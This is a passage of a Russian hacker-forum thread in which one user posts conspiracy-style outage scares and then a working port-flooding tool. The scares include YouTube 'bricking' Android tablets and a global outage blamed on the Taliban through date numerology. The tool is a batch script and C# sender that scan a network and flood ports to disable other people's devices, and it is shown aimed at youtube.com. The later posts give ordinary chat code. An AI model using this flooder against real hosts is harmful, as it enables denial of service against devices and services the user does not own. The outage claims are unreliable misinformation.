Успешные хакерские взломы. Скачать свежие утечки и книги
|
|
Talomir
|
#406 | Вторник, 30.07.2024, 17:33
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ПРЕДУПРЕЖДЕНИЕ БЕЗОПАСНОСТИ С YOUTUBE
Не смотрите youtube на планшетах с ОС Android (версия ОС не уточнена). Ошибки на серверах этого видеохостинга приводят к исчерпанию вторичной памяти планшета и он вообще перестаёт загружаться и работать. Для ремонта понадобилось бы выпаивать микросхему вторичной памяти и менять её или перепрошивать, что почти никто не делает - планшет с Андроид просто идёт в мусорку.
Пока не известно о таких проблемах при просмотре youtube на телефонах, этот способ опасно - не доказан.
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Вторник, 30.07.2024, 17:33
|
|
Статус: нет меня
|
|
|
Talomir
|
#407 | Вторник, 30.07.2024, 21:46
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
МИКРОСОФТ ВРЁТ О НОВОМ ГЛОБАЛЬНОМ СБОЕ
В интернете начали распространяться новости о "новом сбое", глобальном, майкрософт. Однако этим новостям "сложно верить".
Так, на сайте https://portal.microsoft.com, отображающем статусы служб и сервисов компании, отображается All Is Well с работающими статусами всех служб и серверов, а тысячи пользователей "якобы жалуются на сбой" на портале отслеживания проблем https://downdetector.com
Кому верить в такой ситуации? По закону исключённого третьего, из двух противоречащих суждений одно является истинным, а второе ложным.
Микрософт может умалчивать о проблеме на статусах служб, чтобы не упали их акции, в которых инвестировано 3-5 триллионов долларов. Это мотив.
С другой стороны, на сайте https://downdetector.com могли "нажаловаться" боты вместо пользователей, капчи сайт не просит. То есть жалобы могли быть сгенерированы и добавлены сторонней программой, скриптом, с целью повлиять на цену акции Майкрософт и "навариться" на разнице в цене на рынке Форекс. Такой сценарий тоже нельзя отрицать. Мотив есть и у пользователей https://downdetector.com
Итак, новый сбой 30 июля произошёл или нет, мы об этом пока не знаем. Но по разнице чисел "сбоев" 30-19 = 11, всем известное 11 сентября с пентагоном и небоскрёбами всемирного торгового центра, можно предполагать кибернетическую атаку. Кибернетическую атаку на "КИ" - Критическую Инфраструктуру. И стоит за атакой скорее всего всем известное движение арабов-фанатиков "Талибан"!
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Вторник, 30.07.2024, 21:48
|
|
Статус: нет меня
|
|
|
Talomir
|
#408 | Среда, 31.07.2024, 14:23
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
СБОЙ ВСЕГО ИНТЕРНЕТА: ЧЕБУРАТОР ИЛИ КИБЕРНЕТИЧЕСКИЕ СПЕЦЫ
СБОЙ ЕСТЬ: О НЁМ УМАЛЧИВАЕТ СМИ
Служба отслеживания сетевых проблем https://downdetector.su показывает сегодня, 31 июля 2024 года, все две первых страницы мониторинга сайтами со сбоем. Всего около 40 банков, провайдеров, мобильных операторов, видеохостингов, глобальных хостингов картинок, мессенжеров и социальных сетей. Абнормальное количество жалоб на сервисы более 100 за сутки у всех этих обмеряемых сетевых порталов. То есть - происходит глобальный кибернетический сбой, аппокалипсис, цифровой армагедон.
Вероятными причинами наблюдаемого происходящего могут быть: размножающийся сетевой червь типа Червя Морриса, атака кибер-армии Украины с 220 000 хакеров, магнитные бури и климатические аномалии влияющие на качество радиосвязи интернета, математический резонанс последствий глобального сбоя Windows BSOD 19 июля 2024. Пользователям рекомендуется перейти на оффлайн-использование персональных компьютеров, сделав запасы программ, книг, видео и музыки. Похоже, это конец!
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
|
Статус: нет меня
|
|
|
Talomir
|
#409 | Среда, 31.07.2024, 16:11
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
|
Статус: нет меня
|
|
|
Talomir
|
#410 | Четверг, 01.08.2024, 04:45
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ПРОГРАММА ФЛУДА ПОРТОВ В ЛОКАЛЬНОЙ СЕТИ
Иногда надо принудительно выключить или замедлить устройство типа планшета или телефона в локальной сети, когда вы не можете сделать это физически и оно вам мешает. Например, вас обрабатывают в доме с ютюба или планшета родителей. Для этого можно использовать простую программу flood.bat, исходные тексты которой приводятся ниже.
Программа имеет три режима работы: два режима сканирования хостов и один режим флуда мусором.
C:/>flood --scan 192.168.1
В этом режиме программа ищет доступные хосты в локальной подсети 192.168.1.1-255 и отображает на экра их имена. По имени хоста обычно можно сделать вывод что это за устройство, телефон там ноутбук или планшет, и тип его операционной системы.
Код Ответ от 192.168.1.1: число байт=32 время=2мс TTL=64
Обмен пакетами с router.asus.com [192.168.1.1] с 32 байтами данных: Ответ от 192.168.1.1: число байт=32 время=1мс TTL=64
Статистика Ping для 192.168.1.1: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 1мсек, Максимальное = 1 мсек, Среднее = 1 мсек Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128
Обмен пакетами с WIN-J2G446M9P30 [192.168.1.63] с 32 байтами данных: Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128
Статистика Ping для 192.168.1.63: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
В примере запуска видно, что на адресе 192.168.1.1 находится роутер WiFi, а на адресе 192.168.1.63 находится ноутбук Windows
C:/>flood --scan2 192.168
Второй режим поиска хостов, ищет хосты в локальных подсетях 192.168.1-255.1-255 и отображает их адреса и имена
C:/>flood --crash 192.168.1.63
В цикле шлёт на порты 1-1024 вывод генератора мусора phrase.exe (генератор по умолчанию с элементами ИИ). Запущенный без ключа, генератор выводит на экран мусор в формате UNICODE, этот вывод перехватывается и шлётся на порт. Запущенный с ключом -a генератор выводит на экран мусор в формате ASCII или в бинарном формате, этот вывод перехватывается и шлётся на порт.
C:/>flood --crash 192.168.1.63 my_gen.exe
Вместо генератора по умолчанию можно написать свой генератор, и указать его в коммандной строке. В данном примере генератор называется my_gen.exe Всё что должен делать генератор - выводить на экран мусор в формате UNICODE запущенным без ключа и мусор в формате ASCII запущенным с ключом -a. На C# это делается инструкциями Console.WriteLine()
Программа представляет собой batch-скрипт на один экран, работает под всеми x64 версиями windows и использует netcat64 для посылки данных на порт. nc64 надо добавить в исключения антивируса, эту программулину используют не только для тестирования сетевых протоколов, но и для "взлома" в чужие компьютеры.
Код @echo off
if "%1" == "--scan" goto Scan if "%1" == "--scan2" goto Scan2 if "%1" == "--crash" goto Crash
echo FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 echo USAGE: echo flood.bat --scan 192.168.1 find hosts on local net and shows their names and IP addresses echo flood.bat --scan2 192.168 find hosts on local net level 2 and shows their names and IP addresses echo flood.bat --crash 192.168.1.187 flood with supplied phrase.exe generator (no and -a options of generator) echo flood.bat --crash 192.168.1.187 my_gen.exe flood with user's my_gen.exe trash generator
goto exit_me
:Crash
ping -n 1 -a %2
for /L %%P in (1,1,1024) do (
echo Pong %2 %%P TCP unicode if "%3" == "" (cmd /C phrase.exe|nc64 -n -w 1 %2 %%P) else (cmd /C %3|nc64 -n -w 1 %3 %%P)
echo Pong %2 %%P TCP ascii if "%3" == "" (cmd /C phrase.exe -a|nc64 -n -w 1 %2 %%P) else (cmd /C %3 -a|nc64 -n -w 1 %3 %%P) )
goto Crash
:Scan for /L %%Q in (0,1,255) do ( ping -n 1 -w 12 %2.%%Q | find "TTL" if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q ) goto exit_me
:Scan2 for /L %%Q in (0,1,255) do ( for /L %%R in (0,1,255) do ( ping -n 1 -w 12 %2.%%Q.%%R | find "TTL" if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q.%%R ) ) :exit_me
Скачать архив с программой, сетевым котом и интеллектуальным генератором мусора phrase.exe (пароль 123). Обновлено: netcat заменён на более быстрый pipesend.exe на си-шарпе, с исходниками.
hack-13-pipesend-flood.7z
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Четверг, 01.08.2024, 16:26
|
|
Статус: нет меня
|
|
|
Talomir
|
#411 | Четверг, 01.08.2024, 13:07
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
УСКОРЯЕМ ПРОГРАММУ ФЛУДА ПОРТОВ. BEGINNERS TUTORIAL
После того как я написал скрипт флуда портов с использованием ping.exe, phrase.exe и nc64.exe, стало понятно, что он очень медленный: проход по диапазону 1-1024 системных портов суперпользователя занимает несколько часов. И тормозит, очевидно, nc64 (netcat).
Но где он может тормозить? Классика - использование стандартного блокирующего метода сокетов Connect(), если порт закрыт, программа вынуждена ждать пол минуты.
Переписывать netcat, хоть исходники и есть, мы не станем, так как наша задача - поправить программу максимально быстро. А возьмём для этого язык быстрой разработки "приложений" C-шарп с богатым набором системных и сетевых функций. И перепишем netcat, для ускорения, минимальный функционал, который нужен для посылки файла или стандартного ввода программы на TCP порт удалённого устройства. И заменим в скрипте флуда nc64 на нашу новую программу, которую назовём pipesend.
Как всегда, получаем по ip\hostname IPAddress, создаём TCP сокет и вместо метода Socket.Connect вызываем Socket.BeginConnect, получив асинхронный результат. Далее, ждём методом WaitOne 50 миллисекунд и проверяем, Socket.IsConnected. Если за 50 миллисекунд установить соединение с портом не получилось, выходим из программы - порт закрыт. Так мы не ждём пол минуты ответа от закрытого порта и не тормозим проход по всем 1024 портам суперпользователя!
Программа pipesend.cs получилась на один экран, исходники - ниже
Код using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Net; using System.Net.Sockets; using System.IO; using System.Threading;
namespace pipesend { class Program { static bool done = false; static void Main(string[] args) { if (args.Length != 2) { Console.WriteLine("pipesend: send a file to remote tcp port. Version 1.0"); Console.WriteLine("USAGE: pipesend host_or_ip port <file.dat"); Console.WriteLine("EXAMPLE: echo AA|pipesend 192.168.1.1 80"); return; }
try { IPAddress ip = Dns.GetHostAddresses(args[0])[0]; int port = Int32.Parse(args[1]);
Socket sok = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); sok.ReceiveTimeout = 200; sok.SendTimeout = 1000;
IAsyncResult result = sok.BeginConnect(ip, port, null, null);
bool success = result.AsyncWaitHandle.WaitOne(50, true);
if (sok.Connected) { sok.EndConnect(result);
NetworkStream ns = new NetworkStream(sok);
Stream fs = Console.OpenStandardInput();
while (fs.CanRead) { Thread.Sleep(100);
byte[] buf = new byte[8192];
int r = fs.Read(buf, 0, buf.Length);
if (r > 0) { ns.Write(buf, 0, r); Console.Write("."); } else break; }
done = true; try { ns.Close(); } catch { } try { fs.Close(); } catch { } } try { sok.Shutdown(SocketShutdown.Both); } catch { } try { sok.Close(); } catch { }
} catch { }
if (done) Console.WriteLine("ok"); else Console.WriteLine("error"); } } }
Также, поправим скрипт flood.bat для добавления ещё двух режимов: сканирования портов на хосте, часто надо, и флуда конкретного порта вместо всех 1024 портов. Поправленный скрипт на экран приведён ниже.
Код @echo off
if "%1" == "--scan" goto Scan if "%1" == "--scan2" goto Scan2 if "%1" == "--scanports" goto Scanports if "%1" == "--crash" goto Crash if "%1" == "--crashport" goto Crashport
echo FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port echo USAGE: echo flood --scan 192.168.1 find hosts on local net and shows their names and IP addresses echo flood --scan2 192.168 find hosts on local net level 2 and shows their names and IP addresses echo fllod --scanports 192.168.1.1 scan open ports on given host echo flood --crash 192.168.1.187 flood with supplied phrase.exe generator (no and -a options of generator) echo flood --crash 192.168.1.187 my_gen.exe flood with user's my_gen.exe trash generator echo flood --crashport 192.168.1.187 80 flood port with supplied phrase.exe generator (no and -a options of generator) echo flood --crashport 192.168.1.187 80 my.exe flood port with user's my.exe generator
goto exit_me
:Crash
for /L %%P in (1, 1, 1024) do (
echo Pong %2 %%P TCP unicode if "%3" == "" (cmd /C phrase.exe|pipesend %2 %%P) else (cmd /C %3|pipesend %3 %%P)
echo Pong %2 %%P TCP ascii if "%3" == "" (cmd /C phrase.exe -a|pipesend %2 %%P) else (cmd /C %3 -a|pipesend %3 %%P) )
goto Crash
:Crashport
echo Pong %2 %3 TCP unicode if "%4" == "" (cmd /C phrase.exe|pipesend %2 %3) else (cmd /C %4|pipesend %2 %3)
echo Pong %2 %3 TCP ascii if "%4" == "" (cmd /C phrase.exe -a|pipesend %2 %3) else (cmd /C %4 -a|pipesend %2 %3)
goto Crashport
:Scan for /L %%Q in (0, 1, 255) do ( ping -n 1 -w 12 %2.%%Q | find "TTL" if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q ) goto exit_me
:Scan2 for /L %%Q in (0, 1, 255) do ( for /L %%R in (0, 1, 255) do ( ping -n 1 -w 12 %2.%%Q.%%R | find "TTL" if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q.%%R ) ) goto exit_me
:Scanports for /L %%Q in (1, 1, 1024) do ( echo GET|pipesend %2 %%Q | find "ok" if not errorlevel 1 echo %%Q open tcp ) goto exit_me :exit_me
И, теперь, приведём вывод на консоль работающего в локальной сети флудера tcp-портов flood.bat
Код FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port USAGE: flood --scan 192.168.1 find hosts on local net and shows their names and IP addresses flood --scan2 192.168 find hosts on local net level 2 and shows their names and IP addresses fllod --scanports 192.168.1.1 scan open ports on given host flood --crash 192.168.1.187 flood with supplied phrase.exe generator (no and -a options of generator) flood --crash 192.168.1.187 my_gen.exe flood with user's my_gen.exe trash generator flood --crashport 192.168.1.187 80 flood port with supplied phrase.exe generator (no and -a options of generator) flood --crashport 192.168.1.187 80 my.exe flood port with user's my.exe generator
C:/> flood --scan 196.168.1
Ответ от 192.168.1.1: число байт=32 время=4мс TTL=64
Обмен пакетами с router.asus.com [192.168.1.1] с 32 байтами данных: Ответ от 192.168.1.1: число байт=32 время=4мс TTL=64
Статистика Ping для 192.168.1.1: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 4мсек, Максимальное = 4 мсек, Среднее = 4 мсек Ответ от 192.168.1.41: число байт=32 время=72мс TTL=64
Обмен пакетами с 192.168.1.41 по с 32 байтами данных: Ответ от 192.168.1.41: число байт=32 время=38мс TTL=64
Статистика Ping для 192.168.1.41: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 38мсек, Максимальное = 38 мсек, Среднее = 38 мсек Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128
Обмен пакетами с WIN-J2G446M9P30 [192.168.1.63] с 32 байтами данных: Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128
Статистика Ping для 192.168.1.63: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек Ответ от 192.168.1.187: число байт=32 время=4мс TTL=64
Обмен пакетами с Galaxy-M52-5G [192.168.1.187] с 32 байтами данных: Ответ от 192.168.1.187: число байт=32 время=14мс TTL=64
Статистика Ping для 192.168.1.187: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 14мсек, Максимальное = 14 мсек, Среднее = 14 мсек Ответ от 192.168.1.241: число байт=32 время=67мс TTL=64
Обмен пакетами с Vladimirs-MBP [192.168.1.241] с 32 байтами данных: Ответ от 192.168.1.241: число байт=32 время=28мс TTL=64
Статистика Ping для 192.168.1.241: Пакетов: отправлено = 1, получено = 1, потеряно = 0 (0% потерь) Приблизительное время приема-передачи в мс: Минимальное = 28мсек, Максимальное = 28 мсек, Среднее = 28 мсек C:/> flood --scanports 192.168.1.1 .ok 53 open tcp .ok 80 open tcp .ok 515 open tcp
C:/>flood --crashport 192.168.1.1 80
Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii ..ok Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii ..ok Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii .ok Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii ..error Pong 192.168.1.1 80 TCP unicode ....error Pong 192.168.1.1 80 TCP ascii ..error Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii .ok Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii ..error Pong 192.168.1.1 80 TCP unicode ....error Pong 192.168.1.1 80 TCP ascii .ok Pong 192.168.1.1 80 TCP unicode .ok Pong 192.168.1.1 80 TCP ascii .ok Pong 192.168.1.1 80 TCP ascii .Завершить выполнение пакетного файла [Y(да)/N(нет)]? y
Ссылку на скачивание исходников и бинарников обновлю в предыдущем посте...! Качайте.
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
|
Статус: нет меня
|
|
|
Talomir
|
#412 | Четверг, 01.08.2024, 14:04
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
Кстати, скриптом flood.bat можно пользоваться не только для локальной сети, но и для интернет-серверов. Ниже, например, пример скана https://www.youtube.com на открытые tcp-порты суперпользователя:
C:/> flood --scanports www.youtube.com
Код .ok 80 open tcp .ok 443 open tcp
C:/> flood --crashport www.youtube.com 443
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
|
Статус: нет меня
|
|
|
Talomir
|
#413 | Четверг, 01.08.2024, 14:45
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
TALK FOR WINDOWS: ПРОСТОЙ ЧАТ НА ДВУХ КОМАНДАХ
Под операционной системой UNIX изначально была утилита talk, которая позволяла поговорить с любым пользователем сервера по сети. При этом не было никакой привязки к телефону с ФИО, оплаты по тарифу за переговоры, и других проблем современных чат-монополистов. Под Windows такой утилиты не было.
В этом посте я рассказываю как сделать скрипт-чат на Windows при помощи двух команд, netcat (nc64.exe) и pipesend.exe
Для приёма сообщений: C:/> nc64 -L -p 8888
Эта команда начинает слушать порт 8888 и печатать входящие символы в своё окно (на экран, как говорили ранее)
Для посылки сообщений: C:/> pipesend 192.168.1.63 8888
Эта команда открывает консоль по чтению и пересылает все вводимые символы на удалённый TCP порт, 8888 в данном случае, который слушает netcat и печатает символы на экран.
Всё, при помощи pipesend можно говорить с любым, у кого на порту запущен netcat. Если вы находитесь с собеседником не в реальной сети, то у него должен быть реальный ip адрес, иначе соединение не зайдёт в NAT-локалку! Фото работы программ ниже:
Не надо платить Дурову за телеграм и говорить на прослушку ФСБ и психиатрической службы!
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
|
Статус: нет меня
|
|
|
Talomir
|
#414 | Четверг, 01.08.2024, 16:29
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
УЛУЧШАЕМ СКРИПТ-ЧАТ: ОДНА КОМАНДА
Добавил режим прослушивания сокета --listen в утилиту pipesend, теперь можно сделать хак-чат без запрещённого nc64.exe
Для приёма сообщений: C:/> pipesend --listen 8888
Для посылки сообщений: C:/> pipesend 127.0.0.1 8888
Обновил ссылку на скачивание выше...
Код using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Net; using System.Net.Sockets; using System.Net.NetworkInformation; using System.IO; using System.Threading;
namespace pipesend { class Program { static bool done = false; static int port = 80; static void Main(string[] args) { if (args[0].Equals("-h") || args[0].Equals("--help")) { Console.WriteLine("pipesend: send a file to remote tcp port. Version 1.0"); Console.WriteLine("USAGE: pipesend host_or_ip port <file.dat"); Console.WriteLine("EXAMPLE: echo AA|pipesend 192.168.1.1 80"); Console.WriteLine("USAGE: pipesend --listen port"); Console.WriteLine("EXAMPLE: pipesend --listen 80"); return; }
try { port = Int32.Parse(args[1]);
if (args[0].Equals("--listen")) { Task.WaitAll(Task.Run(BindAllInterfaces)); return; }
IPAddress ip = Dns.GetHostAddresses(args[0])[0];
Socket sok = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); sok.ReceiveTimeout = 200; sok.SendTimeout = 1000;
IAsyncResult result = sok.BeginConnect(ip, port, null, null);
bool success = result.AsyncWaitHandle.WaitOne(50, true);
if (sok.Connected) { sok.EndConnect(result);
NetworkStream ns = new NetworkStream(sok);
Stream fs = Console.OpenStandardInput();
while (fs.CanRead) { Thread.Sleep(100);
byte[] buf = new byte[8192];
int r = fs.Read(buf, 0, buf.Length);
if (r > 0) { ns.Write(buf, 0, r); Console.Write("."); } else break;
ns.Flush(); }
done = true; try { ns.Close(); } catch { } try { fs.Close(); } catch { } } try { sok.Shutdown(SocketShutdown.Both); } catch { } try { sok.Close(); } catch { }
} catch { }
if (done) Console.WriteLine("ok"); else Console.WriteLine("error"); }
protected static async Task BindAllInterfaces() { try { List<IPAddress> ip = new List<IPAddress>(); NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces(); foreach (NetworkInterface netInterface in allNetworkInterfaces) { foreach (UnicastIPAddressInformation addr2 in netInterface.GetIPProperties().UnicastAddresses) { try { if (addr2.IPv4Mask.Address != 0L) ip.Add(addr2.Address); } catch { } } } List<Task> list = new List<Task>(); foreach (IPAddress addr in ip) { try { BindSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); BindSocket.Bind(new IPEndPoint(addr, port)); BindSocket.Listen(500); list.Add(Task.Run(Accepter)); } catch { }
await Task.Delay(1000); } Task.WaitAll(list.ToArray<Task>()); } catch { } }
static Socket BindSocket = null; static Socket data = null; static async Task Accepter() { Socket bind = BindSocket; bind.ReceiveTimeout = 256;
while (true) try { data = bind.Accept(); if (data == null) { await Task.Delay(30); continue; } data.ReceiveTimeout = 100000; Task.Run(SocketReader); await Task.Delay(500); } catch { } }
static async Task SocketReader() { Socket DataSocket = data; try { Stream fs = Console.OpenStandardOutput(); NetworkStream ns = new NetworkStream(DataSocket);
while (ns.CanRead) { byte[] buf = new byte[8192];
int r = ns.Read(buf, 0, buf.Length);
if (r < 0) break; else fs.Write(buf, 0, r);
fs.Flush(); } try { fs.Close(); } catch { } try { ns.Close(); } catch { } } catch { }
try { DataSocket.Shutdown(SocketShutdown.Both); } catch { } try { DataSocket.Close(); } catch { } } } }
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Четверг, 01.08.2024, 16:29
|
|
Статус: нет меня
|
|
|
Talomir
|
#415 | Четверг, 01.08.2024, 19:20
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ФОТО: СКРИПТ-ЧАТ НА ОДНОЙ КОММАНДЕ DOS-А, ВМЕСТО ТЕЛЕГРАМА
Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают. Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1 Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
|
Статус: нет меня
|
|
|
Talomir
|
#416 | Пятница, 02.08.2024, 12:08
|
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Диагноз: психически здоров (почти)
ГРУППОВОЙ ЧАТ С ИСХОДНИКАМИ ВСЕГО НА ДВА ЭКРАНА
WINDOWS LINUX MACOS
Раз уж я переписываю запрещённый netcat для своих нужд, и для релиза, то сразу добавил и чат (аналог talk в UNIX) и сделал его групповым. В режиме сервера pipesend биндит перечисляемые в аргументах запуска интерфейсы и ждёт подключений. Пересылаемые по подключениям данные сразу рассылаются по всему массиву подключений, пишет один - читают многие. Также, можно пересылать и текстовые файлы, перенаправив ввод клиента pipesend на файл. Исходники приведу ниже.
1 - чат без шифрования
На сервере с реальным ip: C:/> pipesend --listen 8888 127.0.0.1 192.168.1.63
слушать порт 8888 на интерфейсах 127.0.0.1 и внешнем ip (тут он указан гипотетический)
На клиентах без реального ip: C:> pipesend 192.168.1.63 8888
клиент соединяется с сервером, посылает и принимает текстовые сообщения. Нажимать enter дважды для пересылки своей фразы, чужие фразы отображаются автоматически. Работает и русский язык!
На клиенте для передачи текстового файла: C:/> pipesend 192.168.1.63 <file.txt
Для чата с шифрованием: запускаем pipesend на linux-сервере на интерфейсе 127.0.0.1 и добавляем в SSH пользователей для захода на linux и запуска pipesend 127.0.0.1 8888, так весь трафик будет зашифрован по открытому ключу OpenSSL.
Фотка разговора:
Фотка посылки текстового файла с исходниками:
Исходники на C# (скачать можно будет на днях, я дам ссылку когда поправлю флудер портов с использованием pipesend)
Код using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Net; using System.Net.Sockets; using System.Net.NetworkInformation; using System.IO; using System.Threading;
namespace pipesend { class Program { static bool done = false; static int port = 8888; static void Main(string[] args) { if (args.Length < 2 || args[0].Equals("-h") || args[0].Equals("--help")) { Console.WriteLine("pipesend: send a file to remote tcp port or run a chat-server, version 1.1"); Console.WriteLine("USAGE: pipesend host_or_ip port <file.dat"); Console.WriteLine("EXAMPLE: echo AA|pipesend 192.168.1.1 80"); Console.WriteLine("USAGE: pipesend --listen port local_ip1 [local_ip2 local_ip3...]"); Console.WriteLine("EXAMPLE: pipesend --listen 8888 127.0.0.1"); return; }
try { port = Int32.Parse(args[1]); } catch { }
if (args[0].Equals("--listen")) { List<Task> list = new List<Task>();
for (int i = 2; i < args.Length; i++) try { IPAddress addr = Dns.GetHostAddresses(args[i])[0]; BindSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); BindSocket.Bind(new IPEndPoint(addr, port)); BindSocket.Listen(500); list.Add(Task.Run(Accepter));
Thread.Sleep(1000); } catch { }
Task.WaitAll(list.ToArray<Task>()); } else try { IPAddress ip = Dns.GetHostAddresses(args[0])[0];
Socket sok = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); sok.ReceiveTimeout = 300; sok.SendTimeout = 300;
IAsyncResult result = sok.BeginConnect(ip, port, null, null);
bool success = result.AsyncWaitHandle.WaitOne(100, true);
if (sok.Connected) { //sok.EndConnect(result);
Stream fs = Console.OpenStandardInput(); Stream os = Console.OpenStandardOutput();
while (true) { byte[] buf;
int r = 0;
if (!Console.IsInputRedirected) { buf = new byte[1]; if (Console.KeyAvailable) r = fs.Read(buf, 0, buf.Length); } else { buf = new byte[8192]; r = fs.Read(buf, 0, buf.Length); } if (r > 0) { byte[] sbuf = new byte[r];
for (int i = 0; i < r; i++) sbuf[i] = buf[i];
sok.Send(sbuf);
if (!Console.IsInputRedirected) continue; } else if (Console.IsInputRedirected) break;
try { byte[] rbuf = new byte[8192];
int a = 0;
if (sok.Available > 0) a = sok.Receive(rbuf); if (a > 0) { os.Write(rbuf, 0, a); os.Flush(); } } catch { } }
done = true; try { fs.Close(); } catch { } try { os.Close(); } catch { }
} try { sok.Shutdown(SocketShutdown.Both); } catch { } try { sok.Close(); } catch { }
} catch { }
if (done) Console.WriteLine("ok"); else Console.WriteLine("error"); }
static Socket BindSocket = null; static Socket data = null; static async Task Accepter() { Socket bind = BindSocket; bind.ReceiveTimeout = 256;
while (true) try { data = bind.Accept(); if (data == null) { await Task.Delay(30); continue; } data.ReceiveTimeout = 1000; Task.Run(SocketReader); await Task.Delay(500); } catch { } }
static List<Socket> clients = new List<Socket>();
static object clients_lock = new object();
static async Task SocketReader() { Socket DataSocket = data; NetworkStream ns = null; try { Stream fs = Console.OpenStandardOutput();
lock (clients_lock) clients.Add(DataSocket);
byte[] buf = new byte[8192];
do { int r = 0;
if (DataSocket.Available > 0) r = DataSocket.Receive(buf);
if (r < 0) break; else { byte[] sbuf = new byte[r];
for (int i = 0; i < r; i++) sbuf[i] = buf[i];
fs.Write(buf, 0, r); fs.Flush();
for (int i = 0; i < clients.Count; i++) if (clients[i] != DataSocket) try { clients[i].Send(sbuf); } catch { } } } while (true);
try { fs.Close(); } catch { } } catch { }
try { DataSocket.Shutdown(SocketShutdown.Both); } catch { } try { DataSocket.Close(); } catch { } lock(clients_lock) { for (int i = 0; i < clients.Count; i++) if (clients[i] == DataSocket) { clients.RemoveAt(i); break; } } } } }
